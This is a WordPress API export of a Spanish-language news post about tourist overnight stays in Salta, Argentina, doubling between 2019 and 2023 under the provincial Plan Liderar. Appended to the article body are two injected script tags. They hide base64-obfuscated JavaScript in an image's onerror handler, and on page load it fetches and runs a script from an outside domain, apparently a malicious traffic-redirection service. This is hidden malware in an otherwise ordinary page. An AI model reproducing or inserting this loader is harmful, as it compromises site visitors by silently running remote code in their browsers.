{"id":3211,"date":"2023-10-25T15:37:36","date_gmt":"2023-10-25T18:37:36","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3211"},"modified":"2025-08-14T00:06:44","modified_gmt":"2025-08-14T03:06:44","slug":"la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3211","title":{"rendered":"La cantidad de noches que un turista se queda en Salta se duplic\u00f3 entre 2019 y 2023"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#b30732\"><em>De acuerdo a los registros estad\u00edsticos desarrollados por el Ministerio de Turismo y Deportes provincial el pernocte aument\u00f3 de 2.2 a 4.5 noches, lo que incide directamente en el impacto econ\u00f3mico que genera cada turista.<\/em><\/h4>\n\n\n\n<p>Salta contin\u00faa fortaleciendo su proceso de desarrollo tur\u00edstico a trav\u00e9s de la implementaci\u00f3n del plan estrat\u00e9gico Liderar. De acuerdo a los registros estad\u00edsticos informados por el Ministerio de Turismo y Deportes provincial, el pernocte de los turistas se ha elevado de 2.2 a 4.5 d\u00edas, lo que implica una suba superior al 100% para el periodo comprendido entre 2019 y 2023.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"931\" height=\"600\" data-id=\"3212\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5006-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023.jpg\" alt=\"\" class=\"wp-image-3212\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5006-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023.jpg 931w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5006-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-300x193.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5006-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-768x495.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5006-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-696x449.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5006-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-652x420.jpg 652w\" sizes=\"(max-width: 931px) 100vw, 931px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"902\" height=\"600\" data-id=\"3214\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5007-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023.jpg\" alt=\"\" class=\"wp-image-3214\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5007-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023.jpg 902w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5007-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5007-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-768x511.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5007-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-696x463.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5007-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-631x420.jpg 631w\" sizes=\"(max-width: 902px) 100vw, 902px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"3213\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5010-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023.jpg\" alt=\"\" class=\"wp-image-3213\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5010-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5010-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5010-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5010-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5010-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Estos indicadores reflejan que las experiencias en las regiones tur\u00edsticas generan m\u00e1s inter\u00e9s, por ende, los turistas deciden quedarse m\u00e1s tiempo en Salta, \u201cesto se entiende en primer lugar, por el gran aporte que realiza el sector privado para la mejora y crecimiento en concepto de productos\u201d, afirm\u00f3 el ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a<\/strong>.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9536-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9536-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023.jpg\" alt=\"La cantidad de noches que un turista se queda en Salta se duplic\u00f3 entre 2019 y 2023\" width=\"303\" height=\"211\"\/><\/a><\/figure><\/div>\n\n\n<p>Por este motivo, el Gobierno de Salta puso a disposici\u00f3n una Gu\u00eda de Oportunidades de Inversiones Tur\u00edsticas que no es otra cosa que un estudio de mercado, que detalla d\u00f3nde y c\u00f3mo invertir en esta industria. La misma se puede descargar ingresando a www.salta.gob.ar.<\/p>\n\n\n\n<p>En segundo t\u00e9rmino, el trabajo de los municipios en sus gestiones pone en valor atractivos y recursos naturales que est\u00e1n puestos a disposici\u00f3n de los turistas. El Gobierno de Salta en un trabajo interministerial y con el acompa\u00f1amiento de la Naci\u00f3n, ejecuta obras tur\u00edsticas trascendentes y tambi\u00e9n, infraestructura de base que generan condiciones \u00f3ptimas para la inversi\u00f3n. \u00abEn los resultados, fueron claves dos pol\u00edticas del Ministerio de Turismo de la Naci\u00f3n: el plan 50 Destinos y el programa PreViaje que vino a romper la estacionalidad durante lo que era hace unos a\u00f1os la temporada baja\u00bb.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9537-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023.jpg\" alt=\"\" width=\"295\" height=\"205\"\/><\/figure><\/div>\n\n\n<p>Otro punto a resaltar, consiste en que la misma cantidad de turistas, que no baja en su gasto promedio, permanece el doble de noches en el destino, duplicando el impacto econ\u00f3mico. \u201cJunto al sector privado y los gobiernos municipales, sab\u00edamos que una de las condiciones para que la actividad tur\u00edstica transite un camino de crecimiento, deb\u00eda ser el crecimiento en la oferta, objetivo que en el marco del Plan Liderar estamos cumpliendo\u201d, afirm\u00f3 Pe\u00f1a.<\/p>\n\n\n\n<p>Desarrollado bajo una mirada participativa y federal, el Plan Liderar es el mapa que el Gobierno junto al sector privado provincial ha decidido trazar para lograr un crecimiento hist\u00f3rico en cuanto al desarrollo y la creaci\u00f3n de oportunidades para todos los salte\u00f1os que forman parte de la cadena tur\u00edstica y tambi\u00e9n para quienes se integran a ella d\u00eda a d\u00eda. El ministro Mario Pe\u00f1a destac\u00f3 estos resultados como el \u201cclaro reflejo del trabajo federal de la actividad tur\u00edstica viene llevando adelante de la mano de decisiones pol\u00edticas importantes encabezadas por el gobernador Gustavo S\u00e1enz\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"3218\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5008-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023.jpg\" alt=\"\" class=\"wp-image-3218\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5008-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5008-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5008-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5008-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5008-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"3216\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5009-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023.jpg\" alt=\"\" class=\"wp-image-3216\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5009-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5009-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5009-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5009-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5009-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"3219\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5011-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-1.jpg\" alt=\"\" class=\"wp-image-3219\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5011-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-1.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5011-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-1-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5011-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-1-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5011-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-1-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/5011-la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-1-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-cantidad-de-noches-que-un-turista-se-queda-en-salta-se-duplico-entre-2019-y-2023-92517\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>De acuerdo a los registros estad\u00edsticos desarrollados por el Ministerio de Turismo y Deportes provincial el pernocte aument\u00f3 de 2.2 a 4.5 noches, lo que incide directamente en el impacto econ\u00f3mico que genera cada turista. Salta contin\u00faa fortaleciendo su proceso de desarrollo tur\u00edstico a trav\u00e9s de la implementaci\u00f3n del plan estrat\u00e9gico Liderar. De acuerdo a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3215,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11],"tags":[],"class_list":{"0":"post-3211","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3211"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3211"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3211\/revisions"}],"predecessor-version":[{"id":6939,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3211\/revisions\/6939"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3215"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3211"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3211"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3211"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}